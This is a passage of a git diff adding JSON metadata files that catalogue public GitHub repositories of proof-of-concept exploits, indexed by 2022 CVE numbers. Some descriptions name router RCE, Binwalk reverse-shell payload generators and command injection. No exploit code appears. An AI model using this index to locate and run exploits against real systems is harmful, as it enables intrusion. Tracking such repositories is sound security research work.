b/2022/CVE-2022-45004.json @@ -0,0 +1,33 @@ +[ + { + "id": 620449786, + "name": "CVE-2022-45004", + "full_name": "mha98\/CVE-2022-45004", + "owner": { + "login": "mha98", + "id": 129213216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129213216?v=4", + "html_url": "https:\/\/github.com\/mha98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mha98\/CVE-2022-45004", + "description": null, + "fork": false, + "created_at": "2023-03-28T17:49:59Z", + "updated_at": "2023-03-28T17:49:59Z", + "pushed_at": "2023-03-28T18:03:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45025.json b/2022/CVE-2022-45025.json new file mode 100644 index 0000000000..4a8823574c --- /dev/null +++ b/2022/CVE-2022-45025.json @@ -0,0 +1,70 @@ +[ + { + "id": 576453158, + "name": "CVE-2022-45025", + "full_name": "yuriisanin\/CVE-2022-45025", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-45025", + "description": "[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)", + "fork": false, + "created_at": "2022-12-09T22:48:38Z", + "updated_at": "2024-11-11T01:49:48Z", + "pushed_at": "2022-12-11T13:37:22Z", + "stargazers_count": 89, + "watchers_count": 89, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "exploit", + "markdown", + "rce" + ], + "visibility": "public", + "forks": 20, + "watchers": 89, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652218279, + "name": "CVE-2022-45025", + "full_name": "andyhsu024\/CVE-2022-45025", + "owner": { + "login": "andyhsu024", + "id": 131547485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4", + "html_url": "https:\/\/github.com\/andyhsu024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2022-45025", + "description": null, + "fork": false, + "created_at": "2023-06-11T13:18:12Z", + "updated_at": "2023-06-11T13:18:12Z", + "pushed_at": "2023-06-11T13:18:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45047.json b/2022/CVE-2022-45047.json new file mode 100644 index 0000000000..359e7c260d --- /dev/null +++ b/2022/CVE-2022-45047.json @@ -0,0 +1,33 @@ +[ + { + "id": 624692526, + "name": "CVE-2022-45047", + "full_name": "hktalent\/CVE-2022-45047", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-45047", + "description": "POC,EXP,chatGPT for me", + "fork": false, + "created_at": "2023-04-07T03:16:47Z", + "updated_at": "2023-04-07T03:25:11Z", + "pushed_at": "2023-04-07T03:17:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45059.json b/2022/CVE-2022-45059.json new file mode 100644 index 0000000000..579d65e7fa --- /dev/null +++ b/2022/CVE-2022-45059.json @@ -0,0 +1,33 @@ +[ + { + "id": 717712143, + "name": "CVE-2022-45059-demo", + "full_name": "martinvks\/CVE-2022-45059-demo", + "owner": { + "login": "martinvks", + "id": 5469666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5469666?v=4", + "html_url": "https:\/\/github.com\/martinvks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/martinvks\/CVE-2022-45059-demo", + "description": null, + "fork": false, + "created_at": "2023-11-12T10:51:54Z", + "updated_at": "2023-11-14T08:03:46Z", + "pushed_at": "2023-11-14T08:04:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4510.json b/2022/CVE-2022-4510.json new file mode 100644 index 0000000000..f0ef23b57b --- /dev/null +++ b/2022/CVE-2022-4510.json @@ -0,0 +1,95 @@ +[ + { + "id": 598309338, + "name": "CVE-2022-4510", + "full_name": "electr0sm0g\/CVE-2022-4510", + "owner": { + "login": "electr0sm0g", + "id": 8340491, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8340491?v=4", + "html_url": "https:\/\/github.com\/electr0sm0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electr0sm0g\/CVE-2022-4510", + "description": "Binwalk Remote Command Execution", + "fork": false, + "created_at": "2023-02-06T20:53:49Z", + "updated_at": "2024-11-17T01:33:08Z", + "pushed_at": "2023-02-06T20:54:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 659028420, + "name": "CVE-2022-4510-WalkingPath", + "full_name": "adhikara13\/CVE-2022-4510-WalkingPath", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2022-4510-WalkingPath", + "description": "A Python script for generating exploits targeting CVE-2022-4510 RCE Binwalk. It supports SSH, command execution, and reverse shell options. Exploits are saved in PNG format. Ideal for testing and demonstrations.", + "fork": false, + "created_at": "2023-06-27T02:20:13Z", + "updated_at": "2024-11-22T19:48:06Z", + "pushed_at": "2023-06-27T02:29:26Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665275498, + "name": "BadPfs-CVE-2022-4510", + "full_name": "Kalagious\/BadPfs-CVE-2022-4510", + "owner": { + "login": "Kalagious", + "id": 44515549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44515549?v=4", + "html_url": "https:\/\/github.com\/Kalagious", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kalagious\/BadPfs-CVE-2022-4510", + "description": "Python script that generates pfs payloads to exploit CVE-2022-4510", + "fork": false, + "created_at": "2023-07-11T20:55:58Z", + "updated_at": "2024-06-08T19:59:42Z", + "pushed_at": "2023-07-11T20:59:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45217.json b/2022/CVE-2022-45217.json new file mode 100644 index 0000000000..4c6dd62d3b --- /dev/null +++ b/2022/CVE-2022-45217.json @@ -0,0 +1,33 @@ +[ + { + "id": 572052836, + "name": "CVE-2022-45217", + "full_name": "sudoninja-noob\/CVE-2022-45217", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45217", + "description": null, + "fork": false, + "created_at": "2022-11-29T13:05:14Z", + "updated_at": "2022-11-30T06:11:34Z", + "pushed_at": "2022-11-29T13:05:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45265.json b/2022/CVE-2022-45265.json new file mode 100644 index 0000000000..88e77a0e15 --- /dev/null +++ b/2022/CVE-2022-45265.json @@ -0,0 +1,33 @@ +[ + { + "id": 563364347, + "name": "CVE-2022-45265", + "full_name": "maikroservice\/CVE-2022-45265", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-45265", + "description": null, + "fork": false, + "created_at": "2022-11-08T13:13:25Z", + "updated_at": "2022-12-08T22:01:14Z", + "pushed_at": "2022-12-08T22:00:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45299.json b/2022/CVE-2022-45299.json new file mode 100644 index 0000000000..7bd9f70d17 --- /dev/null +++ b/2022/CVE-2022-45299.json @@ -0,0 +1,33 @@ +[ + { + "id": 588548677, + "name": "CVE-2022-45299", + "full_name": "offalltn\/CVE-2022-45299", + "owner": { + "login": "offalltn", + "id": 110370549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110370549?v=4", + "html_url": "https:\/\/github.com\/offalltn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/offalltn\/CVE-2022-45299", + "description": "CVE 2022-45299", + "fork": false, + "created_at": "2023-01-13T11:47:02Z", + "updated_at": "2023-05-24T12:30:02Z", + "pushed_at": "2023-01-13T12:01:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45354.json b/2022/CVE-2022-45354.json new file mode 100644 index 0000000000..62bace801d --- /dev/null +++ b/2022/CVE-2022-45354.json @@ -0,0 +1,72 @@ +[ + { + "id": 665038717, + "name": "CVE-2022-45354", + "full_name": "RandomRobbieBF\/CVE-2022-45354", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-45354", + "description": "Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API ", + "fork": false, + "created_at": "2023-07-11T09:51:40Z", + "updated_at": "2024-08-12T20:32:05Z", + "pushed_at": "2023-07-11T10:14:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 893013183, + "name": "CVE-2022-45354", + "full_name": "NekomataCode\/CVE-2022-45354", + "owner": { + "login": "NekomataCode", + "id": 173536806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173536806?v=4", + "html_url": "https:\/\/github.com\/NekomataCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NekomataCode\/CVE-2022-45354", + "description": "CVE-2022-45354 Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API", + "fork": false, + "created_at": "2024-11-23T09:56:19Z", + "updated_at": "2024-11-24T00:04:48Z", + "pushed_at": "2024-11-24T00:04:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-45354", + "wordpress-bugs", + "wordpress-hack", + "wordpress-hacking", + "wordpress-vuln", + "wordpress-vulnerability", + "wordpress-vulnerable" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4539.json b/2022/CVE-2022-4539.json new file mode 100644 index 0000000000..21d25114e5 --- /dev/null +++ b/2022/CVE-2022-4539.json @@ -0,0 +1,33 @@ +[ + { + "id": 850688674, + "name": "CVE-2022-4539", + "full_name": "Abdurahmon3236\/CVE-2022-4539", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2022-4539", + "description": null, + "fork": false, + "created_at": "2024-09-01T13:59:21Z", + "updated_at": "2024-09-01T13:59:38Z", + "pushed_at": "2024-09-01T13:59:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4543.json b/2022/CVE-2022-4543.json new file mode 100644 index 0000000000..67b2b52743 --- /dev/null +++ b/2022/CVE-2022-4543.json @@ -0,0 +1,33 @@ +[ + { + "id": 664453374, + "name": "cve-2022-4543-wrapper", + "full_name": "sunichi\/cve-2022-4543-wrapper", + "owner": { + "login": "sunichi", + "id": 14269425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14269425?v=4", + "html_url": "https:\/\/github.com\/sunichi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunichi\/cve-2022-4543-wrapper", + "description": null, + "fork": false, + "created_at": "2023-07-10T02:34:01Z", + "updated_at": "2024-11-19T01:36:09Z", + "pushed_at": "2023-11-22T07:48:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45436.json b/2022/CVE-2022-45436.json new file mode 100644 index 0000000000..fa911b2bc9 --- /dev/null +++ b/2022/CVE-2022-45436.json @@ -0,0 +1,33 @@ +[ + { + "id": 602654488, + "name": "CVE-2022-45436", + "full_name": "damodarnaik\/CVE-2022-45436", + "owner": { + "login": "damodarnaik", + "id": 48156631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48156631?v=4", + "html_url": "https:\/\/github.com\/damodarnaik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/damodarnaik\/CVE-2022-45436", + "description": null, + "fork": false, + "created_at": "2023-02-16T17:03:30Z", + "updated_at": "2023-02-16T17:03:30Z", + "pushed_at": "2023-02-16T17:26:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45451.json b/2022/CVE-2022-45451.json new file mode 100644 index 0000000000..184369e246 --- /dev/null +++ b/2022/CVE-2022-45451.json @@ -0,0 +1,33 @@ +[ + { + "id": 578740451, + "name": "CVE-2022-45451", + "full_name": "alfarom256\/CVE-2022-45451", + "owner": { + "login": "alfarom256", + "id": 36286171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36286171?v=4", + "html_url": "https:\/\/github.com\/alfarom256", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alfarom256\/CVE-2022-45451", + "description": "PoC for Acronis Arbitrary File Read - CVE-2022-45451", + "fork": false, + "created_at": "2022-12-15T19:16:20Z", + "updated_at": "2024-06-21T00:10:37Z", + "pushed_at": "2022-12-20T17:04:34Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45472.json b/2022/CVE-2022-45472.json new file mode 100644 index 0000000000..a09c5e1ed2 --- /dev/null +++ b/2022/CVE-2022-45472.json @@ -0,0 +1,33 @@ +[ + { + "id": 569465962, + "name": "CVE-2022-45472", + "full_name": "nicbrinkley\/CVE-2022-45472", + "owner": { + "login": "nicbrinkley", + "id": 72578931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72578931?v=4", + "html_url": "https:\/\/github.com\/nicbrinkley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nicbrinkley\/CVE-2022-45472", + "description": "DOM Based XSS", + "fork": false, + "created_at": "2022-11-22T22:21:49Z", + "updated_at": "2022-12-10T11:38:24Z", + "pushed_at": "2022-11-22T22:32:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45477.json b/2022/CVE-2022-45477.json new file mode 100644 index 0000000000..ec2058a1b3 --- /dev/null +++ b/2022/CVE-2022-45477.json @@ -0,0 +1,39 @@ +[ + { + "id": 606922362, + "name": "nmap-vulnerability-scan-scripts", + "full_name": "M507\/nmap-vulnerability-scan-scripts", + "owner": { + "login": "M507", + "id": 38591075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4", + "html_url": "https:\/\/github.com\/M507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M507\/nmap-vulnerability-scan-scripts", + "description": "nmap detection scripts for CVE-2022-45477, CVE-2022-45479, CVE-2022-45482, CVE-2022-45481", + "fork": false, + "created_at": "2023-02-26T23:39:42Z", + "updated_at": "2024-11-06T12:30:05Z", + "pushed_at": "2024-04-19T19:57:39Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "network-discovery", + "nmap-scan-script", + "nmap-scripts", + "vulnerability-detection", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45511.json b/2022/CVE-2022-45511.json new file mode 100644 index 0000000000..e56037b35d --- /dev/null +++ b/2022/CVE-2022-45511.json @@ -0,0 +1,33 @@ +[ + { + "id": 580810964, + "name": "cve-2022-45511", + "full_name": "kinderscsaa\/cve-2022-45511", + "owner": { + "login": "kinderscsaa", + "id": 52599926, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52599926?v=4", + "html_url": "https:\/\/github.com\/kinderscsaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kinderscsaa\/cve-2022-45511", + "description": null, + "fork": false, + "created_at": "2022-12-21T14:06:20Z", + "updated_at": "2022-12-21T14:06:20Z", + "pushed_at": "2022-12-21T14:06:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45544.json b/2022/CVE-2022-45544.json new file mode 100644 index 0000000000..1ae43e8b9e --- /dev/null +++ b/2022/CVE-2022-45544.json @@ -0,0 +1,33 @@ +[ + { + "id": 597871098, + "name": "CVE-2022-45544", + "full_name": "tristao-marinho\/CVE-2022-45544", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2022-45544", + "description": "SCHLIX CMS 2.2.7-2 arbitrary File Upload", + "fork": false, + "created_at": "2023-02-05T21:45:37Z", + "updated_at": "2023-02-05T21:45:37Z", + "pushed_at": "2023-02-05T23:45:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45599.json b/2022/CVE-2022-45599.json new file mode 100644 index 0000000000..5acd303eab --- /dev/null +++ b/2022/CVE-2022-45599.json @@ -0,0 +1,33 @@ +[ + { + "id": 604672421, + "name": "CVE-2022-45599", + "full_name": "ethancunt\/CVE-2022-45599", + "owner": { + "login": "ethancunt", + "id": 25339018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25339018?v=4", + "html_url": "https:\/\/github.com\/ethancunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethancunt\/CVE-2022-45599", + "description": null, + "fork": false, + "created_at": "2023-02-21T14:55:21Z", + "updated_at": "2023-02-21T14:58:57Z", + "pushed_at": "2023-02-21T15:05:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45600.json b/2022/CVE-2022-45600.json new file mode 100644 index 0000000000..289c583e5f --- /dev/null +++ b/2022/CVE-2022-45600.json @@ -0,0 +1,33 @@ +[ + { + "id": 604671777, + "name": "CVE-2022-45600", + "full_name": "ethancunt\/CVE-2022-45600", + "owner": { + "login": "ethancunt", + "id": 25339018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25339018?v=4", + "html_url": "https:\/\/github.com\/ethancunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ethancunt\/CVE-2022-45600", + "description": null, + "fork": false, + "created_at": "2023-02-21T14:53:54Z", + "updated_at": "2023-02-21T14:58:54Z", + "pushed_at": "2023-02-21T14:54:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45688.json b/2022/CVE-2022-45688.json new file mode 100644 index 0000000000..658816f7f9 --- /dev/null +++ b/2022/CVE-2022-45688.json @@ -0,0 +1,157 @@ +[ + { + "id": 736427980, + "name": "jsonorg-tp1", + "full_name": "scabench\/jsonorg-tp1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-tp1", + "description": "simple application with a CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-27T22:05:06Z", + "updated_at": "2023-12-27T22:58:41Z", + "pushed_at": "2024-01-21T01:37:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736807099, + "name": "jsonorg-fp1", + "full_name": "scabench\/jsonorg-fp1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fp1", + "description": "simple application with a (unreachable!) CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-28T23:52:36Z", + "updated_at": "2024-01-08T20:16:26Z", + "pushed_at": "2024-01-05T06:20:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736810389, + "name": "jsonorg-fp2", + "full_name": "scabench\/jsonorg-fp2", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fp2", + "description": "simple application with a (unreachable!) CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-29T00:14:20Z", + "updated_at": "2023-12-29T02:00:00Z", + "pushed_at": "2024-01-05T06:22:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736826577, + "name": "jsonorg-fp3", + "full_name": "scabench\/jsonorg-fp3", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fp3", + "description": "simple application with a (unreachable!) CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2023-12-29T02:01:22Z", + "updated_at": "2023-12-29T08:19:56Z", + "pushed_at": "2024-01-05T06:24:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746077851, + "name": "jsonorg-fn1", + "full_name": "scabench\/jsonorg-fn1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/jsonorg-fn1", + "description": "simple application with a CVE-2022-45688 vulnerability", + "fork": false, + "created_at": "2024-01-21T01:28:23Z", + "updated_at": "2024-01-21T12:04:15Z", + "pushed_at": "2024-01-21T01:44:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45701.json b/2022/CVE-2022-45701.json new file mode 100644 index 0000000000..ea4fb329dd --- /dev/null +++ b/2022/CVE-2022-45701.json @@ -0,0 +1,83 @@ +[ + { + "id": 602214790, + "name": "CVE-2022-45701", + "full_name": "yerodin\/CVE-2022-45701", + "owner": { + "login": "yerodin", + "id": 9205071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4", + "html_url": "https:\/\/github.com\/yerodin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-45701", + "description": "Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) POC Exploit (CVE-2022-45701)", + "fork": false, + "created_at": "2023-02-15T18:31:32Z", + "updated_at": "2024-07-24T05:54:30Z", + "pushed_at": "2023-02-16T18:15:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 840470520, + "name": "CVE-2022-45701", + "full_name": "geniuszlyy\/CVE-2022-45701", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2022-45701", + "description": "it is script designed to exploit certain vulnerabilities in routers by sending payloads through SNMP (Simple Network Management 